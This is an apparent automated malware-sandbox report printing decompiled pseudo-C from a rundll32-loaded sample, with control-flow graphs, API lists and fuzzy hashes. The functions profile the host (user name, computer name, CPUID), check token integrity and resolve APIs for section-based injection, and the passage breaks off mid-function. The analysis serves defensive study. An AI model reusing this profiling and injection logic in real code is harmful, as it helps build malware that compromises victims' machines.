                                          control_flow_graph 184 40893d5-40893e9 185 40893eb-40893f0 184->185 186 40893f3-4089405 call 4086f89 184->186 185->186 189 4089459-4089466 186->189 190 4089407-4089417 GetUserNameW 186->190 191 4089468-408947f GetComputerNameW 189->191 190->191 192 4089419-4089429 RtlAllocateHeap 190->192 193 40894bd-40894e1 191->193 194 4089481-4089492 RtlAllocateHeap 191->194 192->191 195 408942b-4089438 GetUserNameW 192->195 194->193 198 4089494-408949d GetComputerNameW 194->198 196 4089448-4089457 HeapFree 195->196 197 408943a-4089446 call 4087cf7 195->197 196->191 197->196 200 40894ae-40894b7 HeapFree 198->200 201 408949f-40894ab call 4087cf7 198->201 200->193 201->200
                                          C-Code - Quality: 96%
                                          			E040893D5(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x408d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04086F89( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x408d2a0 ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x408d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04087CF7(_v8 + _v8, _t64);
							}
							HeapFree( *0x408d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x408d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04087CF7(_v8 + _v8, _t64);
						}
						HeapFree( *0x408d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                          0x040893d5
                                          0x040893dd
                                          0x040893e1
                                          0x040893e4
                                          0x040893e9
                                          0x040893eb
                                          0x040893f0
                                          0x040893f0
                                          0x040893f6
                                          0x040893f8
                                          0x04089405
                                          0x04089466
                                          0x04089407
                                          0x0408940c
                                          0x04089412
                                          0x04089417
                                          0x04089425
                                          0x04089429
                                          0x04089438
                                          0x0408943f
                                          0x04089446
                                          0x04089446
                                          0x04089451
                                          0x04089451
                                          0x04089429
                                          0x04089417
                                          0x04089468
                                          0x0408946e
                                          0x04089478
                                          0x0408947a
                                          0x0408947f
                                          0x0408948e
                                          0x04089492
                                          0x0408949d
                                          0x040894a4
                                          0x040894ab
                                          0x040894ab
                                          0x040894b7
                                          0x040894b7
                                          0x04089492
                                          0x040894c2
                                          0x040894c4
                                          0x040894c7
                                          0x040894c9
                                          0x040894cc
                                          0x040894cf
                                          0x040894d9
                                          0x040894dd
                                          0x040894e1

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0408940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04089423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04089430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04089451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04089478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0408948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04089499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 040894B7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 810a0b6c8d77b8f567ad1740b76a87e8799fafd96706a1c9cb4d8b73aa79f84e
                                          • Instruction ID: 8119bb95c05086bed8a3b4da04675305718925a2b268a655b14bfd77c74b0fde
                                          • Opcode Fuzzy Hash: 810a0b6c8d77b8f567ad1740b76a87e8799fafd96706a1c9cb4d8b73aa79f84e
                                          • Instruction Fuzzy Hash: CF311AB1A00205EFEB10EFA9DA80AAEB7F9EF54314F51457DE585E7250D738EE019B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040853E3, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E040853E3(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x408d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E040858BE(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E0408147E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                          0x040853f0
                                          0x040853f7
                                          0x040853fe
                                          0x04085412
                                          0x0408541d
                                          0x04085435
                                          0x04085442
                                          0x04085445
                                          0x0408544a
                                          0x04085455
                                          0x04085459
                                          0x04085468
                                          0x0408546c
                                          0x04085488
                                          0x04085488
                                          0x0408548c
                                          0x0408548c
                                          0x04085491
                                          0x04085495
                                          0x0408549b
                                          0x0408549c
                                          0x040854a3
                                          0x040854a9

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04085415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04085435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04085445
                                          • CloseHandle.KERNEL32(00000000), ref: 04085495
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04085468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04085470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04085480
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 8f1a4135bb9223dc3afa548d582af470cd9058cfde26b841c7c09d38070d31c1
                                          • Instruction ID: c22990cf90c9db7f32da49b97ea12a28452a1e8d443148d7401bcc0f29575df5
                                          • Opcode Fuzzy Hash: 8f1a4135bb9223dc3afa548d582af470cd9058cfde26b841c7c09d38070d31c1
                                          • Instruction Fuzzy Hash: DE211975900218FFEB00AFA4DD44EAEBBB9EF44314F1041AAE550B62A1C7759A05EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00511954, Relevance: 10.6, APIs: 7, Instructions: 74memorythreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 231 511954-511968 232 51196a-51196b 231->232 233 5119dd-5119ea InterlockedDecrement 231->233 234 511971-51197e InterlockedIncrement 232->234 235 511a2a-511a31 232->235 233->235 236 5119ec-5119f2 233->236 234->235 237 511984-511998 HeapCreate 234->237 238 5119f4 236->238 239 511a1e-511a24 HeapDestroy 236->239 240 5119d8-5119db 237->240 241 51199a-5119cf call 51105a CreateThread 237->241 242 5119f9-511a09 SleepEx 238->242 239->235 240->235 241->235 247 5119d1-5119d4 241->247 244 511a12-511a18 CloseHandle 242->244 245 511a0b-511a10 242->245 244->239 245->242 245->244 247->240
                                          C-Code - Quality: 89%
                                          			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x514108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x51410c;
						if( *0x51410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x514118;
								if( *0x514118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x51410c);
						}
						HeapDestroy( *0x514110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x514108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x514110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x514130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E0051103B, E0051105A(_a12, 0, 0x514118, _t41), 0,  &_a8); // executed
							 *0x51410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                          0x00511957
                                          0x00511963
                                          0x00511965
                                          0x00511968
                                          0x005119e2
                                          0x005119e8
                                          0x005119ea
                                          0x005119ec
                                          0x005119f2
                                          0x005119f4
                                          0x005119f9
                                          0x005119fc
                                          0x00511a07
                                          0x00511a09
                                          0x00000000
                                          0x00000000
                                          0x00511a0b
                                          0x00511a0e
                                          0x00511a10
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00511a10
                                          0x00511a18
                                          0x00511a18
                                          0x00511a24
                                          0x00511a24
                                          0x0051196a
                                          0x0051196b
                                          0x0051198b
                                          0x00511991
                                          0x00511996
                                          0x00511998
                                          0x005119d8
                                          0x005119d8
                                          0x0051199a
                                          0x005119a2
                                          0x005119a9
                                          0x005119c2
                                          0x005119c8
                                          0x005119cf
                                          0x005119d4
                                          0x00000000
                                          0x005119d4
                                          0x005119cf
                                          0x00511998
                                          0x0051196b
                                          0x00511a31

                                          APIs
                                          • InterlockedIncrement.KERNEL32(00514108), ref: 00511976
                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0051198B
                                          • CreateThread.KERNEL32 ref: 005119C2
                                          • InterlockedDecrement.KERNEL32(00514108), ref: 005119E2
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 005119FC
                                          • CloseHandle.KERNEL32 ref: 00511A18
                                          • HeapDestroy.KERNEL32 ref: 00511A24
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                          • String ID:
                                          • API String ID: 3416589138-0
                                          • Opcode ID: 7fce8f01c9cc715cc7439deb8c1803bdbbefbbdb8c28b9c0ca3669d382fd85d1
                                          • Instruction ID: 959d51633458e152970427beafbd5b32c57b90759db2fc7b6a5502db1a8688a4
                                          • Opcode Fuzzy Hash: 7fce8f01c9cc715cc7439deb8c1803bdbbefbbdb8c28b9c0ca3669d382fd85d1
                                          • Instruction Fuzzy Hash: 2621AC31A40605AFE710DF68AC989E97FA8FBB9750B108069FA01E3150E3308EC4EF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0408A060, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 248 408a060-408a0a6 SysAllocString 249 408a1ca-408a1ce 248->249 250 408a0ac-408a0d9 248->250 251 408a1d9-408a1dd 249->251 252 408a1d0-408a1d3 SafeArrayDestroy 249->252 256 408a1c8 250->256 257 408a0df-408a0eb call 408a872 250->257 254 408a1e8-408a1ee 251->254 255 408a1df-408a1e2 SysFreeString 251->255 252->251 255->254 256->249 257->256 260 408a0f1-408a101 257->260 260->256 262 408a107-408a12d IUnknown_QueryInterface_Proxy 260->262 262->256 264 408a133-408a147 262->264 266 408a149-408a14d 264->266 267 408a186-408a18b 264->267 266->267 268 408a14f-408a166 StrStrIW 266->268 269 408a18d-408a192 267->269 270 408a1bf-408a1c4 267->270 271 408a168-408a171 call 40891b5 268->271 272 408a17d-408a180 SysFreeString 268->272 269->270 273 408a194-408a19f call 4081295 269->273 270->256 271->272 279 408a173-408a17b call 408a872 271->279 272->267 276 408a1a4-408a1a8 273->276 276->270 278 408a1aa-408a1af 276->278 280 408a1ba 278->280 281 408a1b1-408a1b8 278->281 279->272 280->270 281->270
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 0408A09B
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 0408A11E
                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 0408A15E
                                          • SysFreeString.OLEAUT32(00000000), ref: 0408A180
                                            • Part of subcall function 040891B5: SysAllocString.OLEAUT32(0408C298), ref: 04089205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 0408A1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 0408A1E2
                                            • Part of subcall function 0408A872: Sleep.KERNEL32(000001F4), ref: 0408A8BA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                          • String ID:
                                          • API String ID: 2118684380-0
                                          • Opcode ID: 299e2786bdb6cc7558a1672d840f061af8500fe638839c4e06fcba6ad5daf9ed
                                          • Instruction ID: 26a886b18b0338e070db04b912c62d5d267b049095044642e14eda58dd45fb23
                                          • Opcode Fuzzy Hash: 299e2786bdb6cc7558a1672d840f061af8500fe638839c4e06fcba6ad5daf9ed
                                          • Instruction Fuzzy Hash: 1A514C35600609AFDB01EFA8D944ADAB7B6EFC8754B14882DE585EB210EB34ED05CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00511F61, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 284 511f61-511f74 call 511026 287 512036 284->287 288 511f7a-511faf GetModuleHandleA GetProcAddress 284->288 289 51203d-512044 287->289 290 511fb1-511fc5 GetProcAddress 288->290 291 51202e-512034 call 511938 288->291 290->291 292 511fc7-511fdb GetProcAddress 290->292 291->289 292->291 294 511fdd-511ff1 GetProcAddress 292->294 294->291 296 511ff3-512007 GetProcAddress 294->296 296->291 297 512009-51201b call 511a34 296->297 299 512020-512025 297->299 299->291 300 512027-51202c 299->300 300->289
                                          C-Code - Quality: 100%
                                          			E00511F61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00511026(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x514144 + 0x515014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x514144 + 0x51514c);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00511938(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x514144 + 0x51515c);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x514144 + 0x51516f);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x514144 + 0x515184);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x514144 + 0x51519a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00511A34(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                          0x00511f70
                                          0x00511f74
                                          0x00512036
                                          0x00511f7a
                                          0x00511f92
                                          0x00511fa1
                                          0x00511fa8
                                          0x00511faa
                                          0x00511faf
                                          0x0051202e
                                          0x0051202f
                                          0x00511fb1
                                          0x00511fbe
                                          0x00511fc0
                                          0x00511fc5
                                          0x00000000
                                          0x00511fc7
                                          0x00511fd4
                                          0x00511fd6
                                          0x00511fdb
                                          0x00000000
                                          0x00511fdd
                                          0x00511fea
                                          0x00511fec
                                          0x00511ff1
                                          0x00000000
                                          0x00511ff3
                                          0x00512000
                                          0x00512002
                                          0x00512007
                                          0x00000000
                                          0x00512009
                                          0x0051200f
                                          0x00512014
                                          0x0051201b
                                          0x00512020
                                          0x00512025
                                          0x00000000
                                          0x00512027
                                          0x0051202a
                                          0x0051202a
                                          0x00512025
                                          0x00512007
                                          0x00511ff1
                                          0x00511fdb
                                          0x00511fc5
                                          0x00511faf
                                          0x00512044

                                          APIs
                                            • Part of subcall function 00511026: HeapAlloc.KERNEL32(00000000,?,00511329,00000208,?,-00000008,?,?,?,0051122F,?), ref: 00511032
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00511B06,?,?,?,?,00000002,?,0051178F), ref: 00511F86
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00511FA8
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00511FBE
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00511FD4
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00511FEA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00512000
                                            • Part of subcall function 00511A34: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00511A91
                                            • Part of subcall function 00511A34: memset.NTDLL ref: 00511AB3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                          • String ID:
                                          • API String ID: 1632424568-0
                                          • Opcode ID: b329a1aacb1b3b5c127086740503305ae64dea1a8c47c3fc8e27545f413d1bc4
                                          • Instruction ID: 17e027be8a8572250a81cb15d365548d9f2f0781757c97feff8c514f586680d8
                                          • Opcode Fuzzy Hash: b329a1aacb1b3b5c127086740503305ae64dea1a8c47c3fc8e27545f413d1bc4
                                          • Instruction Fuzzy Hash: 4B213CB0640606AFE721DF69DD88EEABBECBB58300B055566E505D7211E770ED44CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04087C75, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 301 4087c75-4087c88 302 4087c8f-4087c93 StrChrA 301->302 303 4087c8a-4087c8e 302->303 304 4087c95-4087ca6 call 40858be 302->304 303->302 307 4087ca8-4087cb4 StrTrimA 304->307 308 4087ceb 304->308 310 4087cb6-4087cbf StrChrA 307->310 309 4087ced-4087cf4 308->309 311 4087cd1-4087cdd 310->311 312 4087cc1-4087ccb StrTrimA 310->312 311->310 313 4087cdf-4087ce9 311->313 312->311 313->309
                                          C-Code - Quality: 54%
                                          			E04087C75(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E040858BE(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x408c28c); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x408c28c);
						}
						_t2 = _t27 + 0x10; // 0x4d283a53
						 *( *_t2 + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					_t6 = _t27 + 0x10; // 0x4d283a53
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
				}
				return 0;
			}










                                          0x04087c80
                                          0x04087c84
                                          0x04087c86
                                          0x04087c87
                                          0x04087c8f
                                          0x04087c8f
                                          0x04087c93
                                          0x00000000
                                          0x00000000
                                          0x04087c8a
                                          0x04087c8b
                                          0x04087c8e
                                          0x04087c8e
                                          0x04087c9b
                                          0x04087ca0
                                          0x04087ca6
                                          0x04087cae
                                          0x04087cb4
                                          0x04087cb6
                                          0x04087cbb
                                          0x04087cbf
                                          0x04087cc1
                                          0x04087cc4
                                          0x04087ccb
                                          0x04087ccb
                                          0x04087cd1
                                          0x04087cd5
                                          0x04087cd8
                                          0x04087cd9
                                          0x04087cdb
                                          0x04087ce3
                                          0x04087ce7
                                          0x04087ce7
                                          0x04087cf4

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,04C895AC,?,?,?,04084C85,04C895AC,?,?,?,04084A8B,?,?,?), ref: 04087C8F
                                          • StrTrimA.KERNELBASE(?,0408C28C,00000002,?,?,?,04084C85,04C895AC,?,?,?,04084A8B,?,?,?,4D283A53), ref: 04087CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,04084C85,04C895AC,?,?,?,04084A8B,?,?,?,4D283A53,?), ref: 04087CB9
                                          • StrTrimA.SHLWAPI(00000001,0408C28C,?,?,?,04084C85,04C895AC,?,?,?,04084A8B,?,?,?,4D283A53,?), ref: 04087CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 133eaf7901441bfaf7e243d9b7e91f993243a72a63c979309708c7b9b7b0d3fb
                                          • Instruction ID: 512c00122276637d2faf8686f55b234430ce13e074a4e6ebcfb291863163ad3a
                                          • Opcode Fuzzy Hash: 133eaf7901441bfaf7e243d9b7e91f993243a72a63c979309708c7b9b7b0d3fb
                                          • Instruction Fuzzy Hash: 5301B5726053156BD221AE658E48F3BBFD8EF95A60F21062CF8C1E7280DB64EC0186F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04084908, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 314 4084908-4084922 call 40811af 317 4084938-4084946 314->317 318 4084924-4084932 314->318 320 4084958-4084973 call 4081111 317->320 321 4084948-408494b 317->321 318->317 327 408497d 320->327 328 4084975-408497b 320->328 321->320 322 408494d-4084952 321->322 322->320 324 4084adb 322->324 326 4084add-4084ae2 324->326 329 4084983-4084998 call 4081ec4 call 4081a4e 327->329 328->329 334 408499a-408499d CloseHandle 329->334 335 40849a3-40849a9 329->335 334->335 336 40849ab-40849b0 335->336 337 40849cf-40849e7 call 40858be 335->337 338 4084ac6-4084acb 336->338 339 40849b6 336->339 345 40849e9-4084a11 memset RtlInitializeCriticalSection 337->345 346 4084a13-4084a15 337->346 341 4084acd-4084ad1 338->341 342 4084ad3-4084ad9 338->342 343 40849b9-40849c8 call 4087827 339->343 341->326 341->342 342->326 352 40849ca 343->352 348 4084a16-4084a1a 345->348 346->348 348->338 351 4084a20-4084a36 RtlAllocateHeap 348->351 353 4084a38-4084a64 wsprintfA 351->353 354 4084a66-4084a68 351->354 352->338 355 4084a69-4084a6d 353->355 354->355 355->338 356 4084a6f-4084a8f call 40893d5 call 40898f7 355->356 356->338 361 4084a91-4084a98 call 408205b 356->361 364 4084a9a-4084a9d 361->364 365 4084a9f-4084aa6 361->365 364->338 366 4084aa8-4084aaa 365->366 367 4084abb-4084abf call 4089b6f 365->367 366->338 368 4084aac-4084ab0 call 4086cd3 366->368 371 4084ac4 367->371 372 4084ab5-4084ab9 368->372 371->338 372->338 372->367
                                          C-Code - Quality: 57%
                                          			E04084908(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E040811AF();
				if(_t21 != 0) {
					_t59 =  *0x408d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x408d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x408d164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04081111( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x408d2a4; // 0xbfa5a8
					if( *0x408d25c > 5) {
						_t8 = _t26 + 0x408e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x408ea05; // 0x44283a44
						_t27 = _t7;
					}
					E04081EC4(_t27, _t27);
					_t31 = E04081A4E(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
